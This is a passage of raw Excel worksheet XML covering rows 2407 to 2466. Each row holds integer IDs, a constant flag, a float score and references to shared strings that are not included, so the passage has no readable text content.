        <v>4750</v>
      </c>
      <c r="H2407" t="s">
        <v>4751</v>
      </c>
    </row>
    <row r="2408" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2408" s="1">
        <v>2406</v>
      </c>
      <c r="B2408">
        <v>4685</v>
      </c>
      <c r="C2408">
        <v>4685</v>
      </c>
      <c r="D2408">
        <v>1</v>
      </c>
      <c r="E2408">
        <v>0.99529999494552612</v>
      </c>
      <c r="F2408" t="s">
        <v>3911</v>
      </c>
      <c r="G2408" t="s">
        <v>4752</v>
      </c>
      <c r="H2408" t="s">
        <v>4753</v>
      </c>
    </row>
    <row r="2409" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2409" s="1">
        <v>2407</v>
      </c>
      <c r="B2409">
        <v>1642</v>
      </c>
      <c r="C2409">
        <v>1642</v>
      </c>
      <c r="D2409">
        <v>1</v>
      </c>
      <c r="E2409">
        <v>0.4611000120639801</v>
      </c>
      <c r="F2409" t="s">
        <v>3911</v>
      </c>
      <c r="G2409" t="s">
        <v>4754</v>
      </c>
      <c r="H2409" t="s">
        <v>4755</v>
      </c>
    </row>
    <row r="2410" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2410" s="1">
        <v>2408</v>
      </c>
      <c r="B2410">
        <v>4686</v>
      </c>
      <c r="C2410">
        <v>4686</v>
      </c>
      <c r="D2410">
        <v>1</v>
      </c>
      <c r="E2410">
        <v>0.99290001392364502</v>
      </c>
      <c r="F2410" t="s">
        <v>3911</v>
      </c>
      <c r="G2410" t="s">
        <v>4756</v>
      </c>
      <c r="H2410" t="s">
        <v>4757</v>
      </c>
    </row>
    <row r="2411" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2411" s="1">
        <v>2409</v>
      </c>
      <c r="B2411">
        <v>1640</v>
      </c>
      <c r="C2411">
        <v>1640</v>
      </c>
      <c r="D2411">
        <v>1</v>
      </c>
      <c r="E2411">
        <v>0.40929999947547913</v>
      </c>
      <c r="F2411" t="s">
        <v>3911</v>
      </c>
      <c r="G2411" t="s">
        <v>4758</v>
      </c>
      <c r="H2411" t="s">
        <v>4759</v>
      </c>
    </row>
    <row r="2412" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2412" s="1">
        <v>2410</v>
      </c>
      <c r="B2412">
        <v>1639</v>
      </c>
      <c r="C2412">
        <v>1639</v>
      </c>
      <c r="D2412">
        <v>1</v>
      </c>
      <c r="E2412">
        <v>0.99659997224807739</v>
      </c>
      <c r="F2412" t="s">
        <v>3911</v>
      </c>
      <c r="G2412" t="s">
        <v>4760</v>
      </c>
      <c r="H2412" t="s">
        <v>4761</v>
      </c>
    </row>
    <row r="2413" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2413" s="1">
        <v>2411</v>
      </c>
      <c r="B2413">
        <v>3713</v>
      </c>
      <c r="C2413">
        <v>3713</v>
      </c>
      <c r="D2413">
        <v>1</v>
      </c>
      <c r="E2413">
        <v>0.99449998140335083</v>
      </c>
      <c r="F2413" t="s">
        <v>3911</v>
      </c>
      <c r="G2413" t="s">
        <v>4762</v>
      </c>
      <c r="H2413" t="s">
        <v>4763</v>
      </c>
    </row>
    <row r="2414" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2414" s="1">
        <v>2412</v>
      </c>
      <c r="B2414">
        <v>7188</v>
      </c>
      <c r="C2414">
        <v>7188</v>
      </c>
      <c r="D2414">
        <v>1</v>
      </c>
      <c r="E2414">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2414" t="s">
        <v>3911</v>
      </c>
      <c r="G2414" t="s">
        <v>4764</v>
      </c>
      <c r="H2414" t="s">
        <v>4765</v>
      </c>
    </row>
    <row r="2415" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2415" s="1">
        <v>2413</v>
      </c>
      <c r="B2415">
        <v>7178</v>
      </c>
      <c r="C2415">
        <v>7178</v>
      </c>
      <c r="D2415">
        <v>1</v>
      </c>
      <c r="E2415">
        <v>0.99800002574920654</v>
      </c>
      <c r="F2415" t="s">
        <v>3911</v>
      </c>
      <c r="G2415" t="s">
        <v>4766</v>
      </c>
      <c r="H2415" t="s">
        <v>4767</v>
      </c>
    </row>
    <row r="2416" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2416" s="1">
        <v>2414</v>
      </c>
      <c r="B2416">
        <v>1094</v>
      </c>
      <c r="C2416">
        <v>1094</v>
      </c>
      <c r="D2416">
        <v>1</v>
      </c>
      <c r="E2416">
        <v>0.82330000400543213</v>
      </c>
      <c r="F2416" t="s">
        <v>3911</v>
      </c>
      <c r="G2416" t="s">
        <v>4768</v>
      </c>
      <c r="H2416" t="s">
        <v>4769</v>
      </c>
    </row>
    <row r="2417" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2417" s="1">
        <v>2415</v>
      </c>
      <c r="B2417">
        <v>1097</v>
      </c>
      <c r="C2417">
        <v>1097</v>
      </c>
      <c r="D2417">
        <v>1</v>
      </c>
      <c r="E2417">
        <v>0.48399999737739557</v>
      </c>
      <c r="F2417" t="s">
        <v>3911</v>
      </c>
      <c r="G2417" t="s">
        <v>4770</v>
      </c>
      <c r="H2417" t="s">
        <v>4771</v>
      </c>
    </row>
    <row r="2418" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2418" s="1">
        <v>2416</v>
      </c>
      <c r="B2418">
        <v>6413</v>
      </c>
      <c r="C2418">
        <v>6413</v>
      </c>
      <c r="D2418">
        <v>1</v>
      </c>
      <c r="E2418">
        <v>0.85920000076293945</v>
      </c>
      <c r="F2418" t="s">
        <v>3911</v>
      </c>
      <c r="G2418" t="s">
        <v>4772</v>
      </c>
      <c r="H2418" t="s">
        <v>4123</v>
      </c>
    </row>
    <row r="2419" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2419" s="1">
        <v>2417</v>
      </c>
      <c r="B2419">
        <v>1098</v>
      </c>
      <c r="C2419">
        <v>1098</v>
      </c>
      <c r="D2419">
        <v>1</v>
      </c>
      <c r="E2419">
        <v>0.48379999399185181</v>
      </c>
      <c r="F2419" t="s">
        <v>3911</v>
      </c>
      <c r="G2419" t="s">
        <v>4773</v>
      </c>
      <c r="H2419" t="s">
        <v>4774</v>
      </c>
    </row>
    <row r="2420" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2420" s="1">
        <v>2418</v>
      </c>
      <c r="B2420">
        <v>1099</v>
      </c>
      <c r="C2420">
        <v>1099</v>
      </c>
      <c r="D2420">
        <v>1</v>
      </c>
      <c r="E2420">
        <v>0.62089997529983521</v>
      </c>
      <c r="F2420" t="s">
        <v>3911</v>
      </c>
      <c r="G2420" t="s">
        <v>4775</v>
      </c>
      <c r="H2420" t="s">
        <v>4776</v>
      </c>
    </row>
    <row r="2421" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2421" s="1">
        <v>2419</v>
      </c>
      <c r="B2421">
        <v>5920</v>
      </c>
      <c r="C2421">
        <v>5920</v>
      </c>
      <c r="D2421">
        <v>1</v>
      </c>
      <c r="E2421">
        <v>0.64939999580383301</v>
      </c>
      <c r="F2421" t="s">
        <v>3911</v>
      </c>
      <c r="G2421" t="s">
        <v>4777</v>
      </c>
      <c r="H2421" t="s">
        <v>4778</v>
      </c>
    </row>
    <row r="2422" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2422" s="1">
        <v>2420</v>
      </c>
      <c r="B2422">
        <v>1634</v>
      </c>
      <c r="C2422">
        <v>1634</v>
      </c>
      <c r="D2422">
        <v>1</v>
      </c>
      <c r="E2422">
        <v>0.4763999879360199</v>
      </c>
      <c r="F2422" t="s">
        <v>3911</v>
      </c>
      <c r="G2422" t="s">
        <v>4779</v>
      </c>
      <c r="H2422" t="s">
        <v>4780</v>
      </c>
    </row>
    <row r="2423" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2423" s="1">
        <v>2421</v>
      </c>
      <c r="B2423">
        <v>5808</v>
      </c>
      <c r="C2423">
        <v>5808</v>
      </c>
      <c r="D2423">
        <v>1</v>
      </c>
      <c r="E2423">
        <v>0.76959997415542603</v>
      </c>
      <c r="F2423" t="s">
        <v>3911</v>
      </c>
      <c r="G2423" t="s">
        <v>4781</v>
      </c>
      <c r="H2423" t="s">
        <v>4782</v>
      </c>
    </row>
    <row r="2424" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2424" s="1">
        <v>2422</v>
      </c>
      <c r="B2424">
        <v>5807</v>
      </c>
      <c r="C2424">
        <v>5807</v>
      </c>
      <c r="D2424">
        <v>1</v>
      </c>
      <c r="E2424">
        <v>0.97079998254776001</v>
      </c>
      <c r="F2424" t="s">
        <v>3911</v>
      </c>
      <c r="G2424" t="s">
        <v>4783</v>
      </c>
      <c r="H2424" t="s">
        <v>4784</v>
      </c>
    </row>
    <row r="2425" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2425" s="1">
        <v>2423</v>
      </c>
      <c r="B2425">
        <v>3506</v>
      </c>
      <c r="C2425">
        <v>3506</v>
      </c>
      <c r="D2425">
        <v>1</v>
      </c>
      <c r="E2425">
        <v>0.71729999780654907</v>
      </c>
      <c r="F2425" t="s">
        <v>3911</v>
      </c>
      <c r="G2425" t="s">
        <v>4785</v>
      </c>
      <c r="H2425" t="s">
        <v>4786</v>
      </c>
    </row>
    <row r="2426" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2426" s="1">
        <v>2424</v>
      </c>
      <c r="B2426">
        <v>4589</v>
      </c>
      <c r="C2426">
        <v>4589</v>
      </c>
      <c r="D2426">
        <v>1</v>
      </c>
      <c r="E2426">
        <v>0.98860001564025879</v>
      </c>
      <c r="F2426" t="s">
        <v>3911</v>
      </c>
      <c r="G2426" t="s">
        <v>4787</v>
      </c>
      <c r="H2426" t="s">
        <v>4788</v>
      </c>
    </row>
    <row r="2427" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2427" s="1">
        <v>2425</v>
      </c>
      <c r="B2427">
        <v>5954</v>
      </c>
      <c r="C2427">
        <v>5954</v>
      </c>
      <c r="D2427">
        <v>1</v>
      </c>
      <c r="E2427">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2427" t="s">
        <v>3911</v>
      </c>
      <c r="G2427" t="s">
        <v>4789</v>
      </c>
      <c r="H2427" t="s">
        <v>4790</v>
      </c>
    </row>
    <row r="2428" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2428" s="1">
        <v>2426</v>
      </c>
      <c r="B2428">
        <v>946</v>
      </c>
      <c r="C2428">
        <v>946</v>
      </c>
      <c r="D2428">
        <v>1</v>
      </c>
      <c r="E2428">
        <v>0.49590000510215759</v>
      </c>
      <c r="F2428" t="s">
        <v>3911</v>
      </c>
      <c r="G2428" t="s">
        <v>4791</v>
      </c>
      <c r="H2428" t="s">
        <v>4792</v>
      </c>
    </row>
    <row r="2429" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2429" s="1">
        <v>2427</v>
      </c>
      <c r="B2429">
        <v>4594</v>
      </c>
      <c r="C2429">
        <v>4594</v>
      </c>
      <c r="D2429">
        <v>1</v>
      </c>
      <c r="E2429">
        <v>0.82389998435974121</v>
      </c>
      <c r="F2429" t="s">
        <v>3911</v>
      </c>
      <c r="G2429" t="s">
        <v>4793</v>
      </c>
      <c r="H2429" t="s">
        <v>4794</v>
      </c>
    </row>
    <row r="2430" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2430" s="1">
        <v>2428</v>
      </c>
      <c r="B2430">
        <v>7488</v>
      </c>
      <c r="C2430">
        <v>7488</v>
      </c>
      <c r="D2430">
        <v>1</v>
      </c>
      <c r="E2430">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2430" t="s">
        <v>3911</v>
      </c>
      <c r="G2430" t="s">
        <v>4795</v>
      </c>
      <c r="H2430" t="s">
        <v>4796</v>
      </c>
    </row>
    <row r="2431" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2431" s="1">
        <v>2429</v>
      </c>
      <c r="B2431">
        <v>5050</v>
      </c>
      <c r="C2431">
        <v>5050</v>
      </c>
      <c r="D2431">
        <v>1</v>
      </c>
      <c r="E2431">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2431" t="s">
        <v>3911</v>
      </c>
      <c r="G2431" t="s">
        <v>4797</v>
      </c>
      <c r="H2431" t="s">
        <v>4798</v>
      </c>
    </row>
    <row r="2432" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2432" s="1">
        <v>2430</v>
      </c>
      <c r="B2432">
        <v>3465</v>
      </c>
      <c r="C2432">
        <v>3465</v>
      </c>
      <c r="D2432">
        <v>1</v>
      </c>
      <c r="E2432">
        <v>0.89200001955032349</v>
      </c>
      <c r="F2432" t="s">
        <v>3911</v>
      </c>
      <c r="G2432" t="s">
        <v>4799</v>
      </c>
      <c r="H2432" t="s">
        <v>4800</v>
      </c>
    </row>
    <row r="2433" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2433" s="1">
        <v>2431</v>
      </c>
      <c r="B2433">
        <v>109</v>
      </c>
      <c r="C2433">
        <v>109</v>
      </c>
      <c r="D2433">
        <v>1</v>
      </c>
      <c r="E2433">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2433" t="s">
        <v>3911</v>
      </c>
      <c r="G2433" t="s">
        <v>4801</v>
      </c>
      <c r="H2433" t="s">
        <v>4802</v>
      </c>
    </row>
    <row r="2434" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2434" s="1">
        <v>2432</v>
      </c>
      <c r="B2434">
        <v>4602</v>
      </c>
      <c r="C2434">
        <v>4602</v>
      </c>
      <c r="D2434">
        <v>1</v>
      </c>
      <c r="E2434">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2434" t="s">
        <v>3911</v>
      </c>
      <c r="G2434" t="s">
        <v>4803</v>
      </c>
      <c r="H2434" t="s">
        <v>4804</v>
      </c>
    </row>
    <row r="2435" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2435" s="1">
        <v>2433</v>
      </c>
      <c r="B2435">
        <v>5520</v>
      </c>
      <c r="C2435">
        <v>5520</v>
      </c>
      <c r="D2435">
        <v>1</v>
      </c>
      <c r="E2435">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2435" t="s">
        <v>3911</v>
      </c>
      <c r="G2435" t="s">
        <v>4805</v>
      </c>
      <c r="H2435" t="s">
        <v>4806</v>
      </c>
    </row>
    <row r="2436" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2436" s="1">
        <v>2434</v>
      </c>
      <c r="B2436">
        <v>4607</v>
      </c>
      <c r="C2436">
        <v>4607</v>
      </c>
      <c r="D2436">
        <v>1</v>
      </c>
      <c r="E2436">
        <v>0.99839997291564941</v>
      </c>
      <c r="F2436" t="s">
        <v>3911</v>
      </c>
      <c r="G2436" t="s">
        <v>4807</v>
      </c>
      <c r="H2436" t="s">
        <v>4808</v>
      </c>
    </row>
    <row r="2437" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2437" s="1">
        <v>2435</v>
      </c>
      <c r="B2437">
        <v>7481</v>
      </c>
      <c r="C2437">
        <v>7481</v>
      </c>
      <c r="D2437">
        <v>1</v>
      </c>
      <c r="E2437">
        <v>0.98869997262954712</v>
      </c>
      <c r="F2437" t="s">
        <v>3911</v>
      </c>
      <c r="G2437" t="s">
        <v>4809</v>
      </c>
      <c r="H2437" t="s">
        <v>4810</v>
      </c>
    </row>
    <row r="2438" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2438" s="1">
        <v>2436</v>
      </c>
      <c r="B2438">
        <v>5628</v>
      </c>
      <c r="C2438">
        <v>5628</v>
      </c>
      <c r="D2438">
        <v>1</v>
      </c>
      <c r="E2438">
        <v>0.47549998760223389</v>
      </c>
      <c r="F2438" t="s">
        <v>3911</v>
      </c>
      <c r="G2438" t="s">
        <v>4811</v>
      </c>
      <c r="H2438" t="s">
        <v>4812</v>
      </c>
    </row>
    <row r="2439" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2439" s="1">
        <v>2437</v>
      </c>
      <c r="B2439">
        <v>104</v>
      </c>
      <c r="C2439">
        <v>104</v>
      </c>
      <c r="D2439">
        <v>1</v>
      </c>
      <c r="E2439">
        <v>0.71139997243881226</v>
      </c>
      <c r="F2439" t="s">
        <v>3911</v>
      </c>
      <c r="G2439" t="s">
        <v>4813</v>
      </c>
      <c r="H2439" t="s">
        <v>4814</v>
      </c>
    </row>
    <row r="2440" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2440" s="1">
        <v>2438</v>
      </c>
      <c r="B2440">
        <v>5596</v>
      </c>
      <c r="C2440">
        <v>5596</v>
      </c>
      <c r="D2440">
        <v>1</v>
      </c>
      <c r="E2440">
        <v>0.52359998226165771</v>
      </c>
      <c r="F2440" t="s">
        <v>3911</v>
      </c>
      <c r="G2440" t="s">
        <v>4815</v>
      </c>
      <c r="H2440" t="s">
        <v>4816</v>
      </c>
    </row>
    <row r="2441" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2441" s="1">
        <v>2439</v>
      </c>
      <c r="B2441">
        <v>7477</v>
      </c>
      <c r="C2441">
        <v>7477</v>
      </c>
      <c r="D2441">
        <v>1</v>
      </c>
      <c r="E2441">
        <v>0.88200002908706665</v>
      </c>
      <c r="F2441" t="s">
        <v>3911</v>
      </c>
      <c r="G2441" t="s">
        <v>4817</v>
      </c>
      <c r="H2441" t="s">
        <v>4818</v>
      </c>
    </row>
    <row r="2442" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2442" s="1">
        <v>2440</v>
      </c>
      <c r="B2442">
        <v>5955</v>
      </c>
      <c r="C2442">
        <v>5955</v>
      </c>
      <c r="D2442">
        <v>1</v>
      </c>
      <c r="E2442">
        <v>0.99699997901916504</v>
      </c>
      <c r="F2442" t="s">
        <v>3911</v>
      </c>
      <c r="G2442" t="s">
        <v>4819</v>
      </c>
      <c r="H2442" t="s">
        <v>4820</v>
      </c>
    </row>
    <row r="2443" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2443" s="1">
        <v>2441</v>
      </c>
      <c r="B2443">
        <v>5956</v>
      </c>
      <c r="C2443">
        <v>5956</v>
      </c>
      <c r="D2443">
        <v>1</v>
      </c>
      <c r="E2443">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2443" t="s">
        <v>3911</v>
      </c>
      <c r="G2443" t="s">
        <v>4821</v>
      </c>
      <c r="H2443" t="s">
        <v>4822</v>
      </c>
    </row>
    <row r="2444" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2444" s="1">
        <v>2442</v>
      </c>
      <c r="B2444">
        <v>4566</v>
      </c>
      <c r="C2444">
        <v>4566</v>
      </c>
      <c r="D2444">
        <v>1</v>
      </c>
      <c r="E2444">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2444" t="s">
        <v>3911</v>
      </c>
      <c r="G2444" t="s">
        <v>4823</v>
      </c>
      <c r="H2444" t="s">
        <v>4824</v>
      </c>
    </row>
    <row r="2445" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2445" s="1">
        <v>2443</v>
      </c>
      <c r="B2445">
        <v>5794</v>
      </c>
      <c r="C2445">
        <v>5794</v>
      </c>
      <c r="D2445">
        <v>1</v>
      </c>
      <c r="E2445">
        <v>0.72280001640319824</v>
      </c>
      <c r="F2445" t="s">
        <v>3911</v>
      </c>
      <c r="G2445" t="s">
        <v>4825</v>
      </c>
      <c r="H2445" t="s">
        <v>4826</v>
      </c>
    </row>
    <row r="2446" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2446" s="1">
        <v>2444</v>
      </c>
      <c r="B2446">
        <v>922</v>
      </c>
      <c r="C2446">
        <v>922</v>
      </c>
      <c r="D2446">
        <v>1</v>
      </c>
      <c r="E2446">
        <v>0.99730002880096436</v>
      </c>
      <c r="F2446" t="s">
        <v>3911</v>
      </c>
      <c r="G2446" t="s">
        <v>4827</v>
      </c>
      <c r="H2446" t="s">
        <v>4828</v>
      </c>
    </row>
    <row r="2447" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2447" s="1">
        <v>2445</v>
      </c>
      <c r="B2447">
        <v>5510</v>
      </c>
      <c r="C2447">
        <v>5510</v>
      </c>
      <c r="D2447">
        <v>1</v>
      </c>
      <c r="E2447">
        <v>0.60519999265670776</v>
      </c>
      <c r="F2447" t="s">
        <v>3911</v>
      </c>
      <c r="G2447" t="s">
        <v>4829</v>
      </c>
      <c r="H2447" t="s">
        <v>4830</v>
      </c>
    </row>
    <row r="2448" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2448" s="1">
        <v>2446</v>
      </c>
      <c r="B2448">
        <v>3454</v>
      </c>
      <c r="C2448">
        <v>3454</v>
      </c>
      <c r="D2448">
        <v>1</v>
      </c>
      <c r="E2448">
        <v>0.5404999852180481</v>
      </c>
      <c r="F2448" t="s">
        <v>3911</v>
      </c>
      <c r="G2448" t="s">
        <v>4831</v>
      </c>
      <c r="H2448" t="s">
        <v>4832</v>
      </c>
    </row>
    <row r="2449" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2449" s="1">
        <v>2447</v>
      </c>
      <c r="B2449">
        <v>5796</v>
      </c>
      <c r="C2449">
        <v>5796</v>
      </c>
      <c r="D2449">
        <v>1</v>
      </c>
      <c r="E2449">
        <v>0.61529999971389771</v>
      </c>
      <c r="F2449" t="s">
        <v>3911</v>
      </c>
      <c r="G2449" t="s">
        <v>4833</v>
      </c>
      <c r="H2449" t="s">
        <v>4834</v>
      </c>
    </row>
    <row r="2450" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2450" s="1">
        <v>2448</v>
      </c>
      <c r="B2450">
        <v>3463</v>
      </c>
      <c r="C2450">
        <v>3463</v>
      </c>
      <c r="D2450">
        <v>1</v>
      </c>
      <c r="E2450">
        <v>0.89090001583099365</v>
      </c>
      <c r="F2450" t="s">
        <v>3911</v>
      </c>
      <c r="G2450" t="s">
        <v>4835</v>
      </c>
      <c r="H2450" t="s">
        <v>4836</v>
      </c>
    </row>
    <row r="2451" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2451" s="1">
        <v>2449</v>
      </c>
      <c r="B2451">
        <v>3456</v>
      </c>
      <c r="C2451">
        <v>3456</v>
      </c>
      <c r="D2451">
        <v>1</v>
      </c>
      <c r="E2451">
        <v>0.97780001163482666</v>
      </c>
      <c r="F2451" t="s">
        <v>3911</v>
      </c>
      <c r="G2451" t="s">
        <v>4837</v>
      </c>
      <c r="H2451" t="s">
        <v>4838</v>
      </c>
    </row>
    <row r="2452" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2452" s="1">
        <v>2450</v>
      </c>
      <c r="B2452">
        <v>5963</v>
      </c>
      <c r="C2452">
        <v>5963</v>
      </c>
      <c r="D2452">
        <v>1</v>
      </c>
      <c r="E2452">
        <v>0.69650000333786011</v>
      </c>
      <c r="F2452" t="s">
        <v>3911</v>
      </c>
      <c r="G2452" t="s">
        <v>4839</v>
      </c>
      <c r="H2452" t="s">
        <v>4840</v>
      </c>
    </row>
    <row r="2453" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2453" s="1">
        <v>2451</v>
      </c>
      <c r="B2453">
        <v>1896</v>
      </c>
      <c r="C2453">
        <v>1896</v>
      </c>
      <c r="D2453">
        <v>1</v>
      </c>
      <c r="E2453">
        <v>0.52950000762939453</v>
      </c>
      <c r="F2453" t="s">
        <v>3911</v>
      </c>
      <c r="G2453" t="s">
        <v>4841</v>
      </c>
      <c r="H2453" t="s">
        <v>4842</v>
      </c>
    </row>
    <row r="2454" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2454" s="1">
        <v>2452</v>
      </c>
      <c r="B2454">
        <v>1894</v>
      </c>
      <c r="C2454">
        <v>1894</v>
      </c>
      <c r="D2454">
        <v>1</v>
      </c>
      <c r="E2454">
        <v>0.66130000352859497</v>
      </c>
      <c r="F2454" t="s">
        <v>3911</v>
      </c>
      <c r="G2454" t="s">
        <v>4843</v>
      </c>
      <c r="H2454" t="s">
        <v>4844</v>
      </c>
    </row>
    <row r="2455" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2455" s="1">
        <v>2453</v>
      </c>
      <c r="B2455">
        <v>5960</v>
      </c>
      <c r="C2455">
        <v>5960</v>
      </c>
      <c r="D2455">
        <v>1</v>
      </c>
      <c r="E2455">
        <v>0.79670000076293945</v>
      </c>
      <c r="F2455" t="s">
        <v>3911</v>
      </c>
      <c r="G2455" t="s">
        <v>4845</v>
      </c>
      <c r="H2455" t="s">
        <v>4846</v>
      </c>
    </row>
    <row r="2456" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2456" s="1">
        <v>2454</v>
      </c>
      <c r="B2456">
        <v>5958</v>
      </c>
      <c r="C2456">
        <v>5958</v>
      </c>
      <c r="D2456">
        <v>1</v>
      </c>
      <c r="E2456">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2456" t="s">
        <v>3911</v>
      </c>
      <c r="G2456" t="s">
        <v>4847</v>
      </c>
      <c r="H2456" t="s">
        <v>4848</v>
      </c>
    </row>
    <row r="2457" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2457" s="1">
        <v>2455</v>
      </c>
      <c r="B2457">
        <v>5957</v>
      </c>
      <c r="C2457">
        <v>5957</v>
      </c>
      <c r="D2457">
        <v>1</v>
      </c>
      <c r="E2457">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2457" t="s">
        <v>3911</v>
      </c>
      <c r="G2457" t="s">
        <v>4849</v>
      </c>
      <c r="H2457" t="s">
        <v>4850</v>
      </c>
    </row>
    <row r="2458" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2458" s="1">
        <v>2456</v>
      </c>
      <c r="B2458">
        <v>1902</v>
      </c>
      <c r="C2458">
        <v>1902</v>
      </c>
      <c r="D2458">
        <v>1</v>
      </c>
      <c r="E2458">
        <v>0.54780000448226929</v>
      </c>
      <c r="F2458" t="s">
        <v>3911</v>
      </c>
      <c r="G2458" t="s">
        <v>4851</v>
      </c>
      <c r="H2458" t="s">
        <v>4852</v>
      </c>
    </row>
    <row r="2459" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2459" s="1">
        <v>2457</v>
      </c>
      <c r="B2459">
        <v>1575</v>
      </c>
      <c r="C2459">
        <v>1575</v>
      </c>
      <c r="D2459">
        <v>1</v>
      </c>
      <c r="E2459">
        <v>0.81269997358322144</v>
      </c>
      <c r="F2459" t="s">
        <v>3911</v>
      </c>
      <c r="G2459" t="s">
        <v>4853</v>
      </c>
      <c r="H2459" t="s">
        <v>4854</v>
      </c>
    </row>
    <row r="2460" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2460" s="1">
        <v>2458</v>
      </c>
      <c r="B2460">
        <v>4611</v>
      </c>
      <c r="C2460">
        <v>4611</v>
      </c>
      <c r="D2460">
        <v>1</v>
      </c>
      <c r="E2460">
        <v>0.49320000410079962</v>
      </c>
      <c r="F2460" t="s">
        <v>3911</v>
      </c>
      <c r="G2460" t="s">
        <v>4855</v>
      </c>
      <c r="H2460" t="s">
        <v>4856</v>
      </c>
    </row>
    <row r="2461" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2461" s="1">
        <v>2459</v>
      </c>
      <c r="B2461">
        <v>1825</v>
      </c>
      <c r="C2461">
        <v>1825</v>
      </c>
      <c r="D2461">
        <v>1</v>
      </c>
      <c r="E2461">
        <v>0.72299998998641968</v>
      </c>
      <c r="F2461" t="s">
        <v>3911</v>
      </c>
      <c r="G2461" t="s">
        <v>4857</v>
      </c>
      <c r="H2461" t="s">
        <v>4858</v>
      </c>
    </row>
    <row r="2462" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2462" s="1">
        <v>2460</v>
      </c>
      <c r="B2462">
        <v>1012</v>
      </c>
      <c r="C2462">
        <v>1012</v>
      </c>
      <c r="D2462">
        <v>1</v>
      </c>
      <c r="E2462">
        <v>0.39559999108314509</v>
      </c>
      <c r="F2462" t="s">
        <v>3911</v>
      </c>
      <c r="G2462" t="s">
        <v>4859</v>
      </c>
      <c r="H2462" t="s">
        <v>4860</v>
      </c>
    </row>
    <row r="2463" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2463" s="1">
        <v>2461</v>
      </c>
      <c r="B2463">
        <v>1766</v>
      </c>
      <c r="C2463">
        <v>1766</v>
      </c>
      <c r="D2463">
        <v>1</v>
      </c>
      <c r="E2463">
        <v>0.43830001354217529</v>
      </c>
      <c r="F2463" t="s">
        <v>3911</v>
      </c>
      <c r="G2463" t="s">
        <v>4861</v>
      </c>
      <c r="H2463" t="s">
        <v>4862</v>
      </c>
    </row>
    <row r="2464" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2464" s="1">
        <v>2462</v>
      </c>
      <c r="B2464">
        <v>1013</v>
      </c>
      <c r="C2464">
        <v>1013</v>
      </c>
      <c r="D2464">
        <v>1</v>
      </c>
      <c r="E2464">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2464" t="s">
        <v>3911</v>
      </c>
      <c r="G2464" t="s">
        <v>4863</v>
      </c>
      <c r="H2464" t="s">
        <v>4864</v>
      </c>
    </row>
    <row r="2465" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2465" s="1">
        <v>2463</v>
      </c>
      <c r="B2465">
        <v>1761</v>
      </c>
      <c r="C2465">
        <v>1761</v>
      </c>
      <c r="D2465">
        <v>1</v>
      </c>
      <c r="E2465">
        <v>0.38620001077651978</v>
      </c>
      <c r="F2465" t="s">
        <v>3911</v>
      </c>
      <c r="G2465" t="s">
        <v>4865</v>
      </c>
      <c r="H2465" t="s">
        <v>4866</v>
      </c>
    </row>
    <row r="2466" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2466" s="1">
